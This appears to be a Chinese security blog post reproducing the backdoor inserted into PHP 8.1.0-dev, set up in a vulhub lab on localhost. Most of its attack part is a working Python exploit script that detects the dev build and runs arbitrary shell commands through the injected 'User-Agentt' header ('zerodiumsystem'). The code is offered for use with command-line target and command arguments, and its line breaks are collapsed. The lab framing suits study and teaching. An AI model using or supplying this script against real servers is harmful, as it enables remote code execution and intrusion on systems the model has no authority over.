PHP 8.1.0-dev 开发版本后门复现

admin 2021年8月24日21:31:40评论75 views字数 1047阅读3分29秒阅读模式

0x00:简介


    PHP 8.1.0-dev 开发版本在2021年3月28日被植入后门,但是后门很快被发现并修正。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来执行任意代码。


0x01:搭建环境


https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor


PHP 8.1.0-dev 开发版本后门复现

然后访问本地地址

http://127.0.0.1:8080/


PHP 8.1.0-dev 开发版本后门复现

0x02:漏洞复现


PHP 8.1.0-dev 开发版本后门复现

神秘代码

#!/usr/bin/env python3import requestsimport argparse
from requests.models import parse_header_links
s = requests.Session()
def checkTarget(args): r = s.get(args.url) for h in r.headers.items(): if "PHP/8.1.0-dev" in h[1]: return True return False

def execCmd(args): r = s.get(args.url, headers={"User-Agentt":"zerodiumsystem(""+args.cmd+"");"}) res = r.text.split("<!DOCTYPE html>")[0] if not res: print("[-] No Results") else: print("[+] Results:") print(res.strip())

def main():
parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="Target URL (Eg: http://127.0.0.1:8080/)", required=True) parser.add_argument("-c", "--cmd", help="Command to execute (Eg: ls,id,whoami)", default="id") args = parser.parse_args()
if checkTarget(args): execCmd(args) else: print("[!] Not Vulnerable or url error") exit(0) if __name__ == "__main__": main()
PHP 8.1.0-dev 开发版本后门复现

扫码二维码

获取更多精彩

洛米唯熊

PHP 8.1.0-dev 开发版本后门复现




点个在看 你最好看



PHP 8.1.0-dev 开发版本后门复现

本文始发于微信公众号(洛米唯熊):PHP 8.1.0-dev 开发版本后门复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月24日21:31:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PHP 8.1.0-dev 开发版本后门复现http://cn-sec.com/archives/383276.html

发表评论

匿名网友 填写信息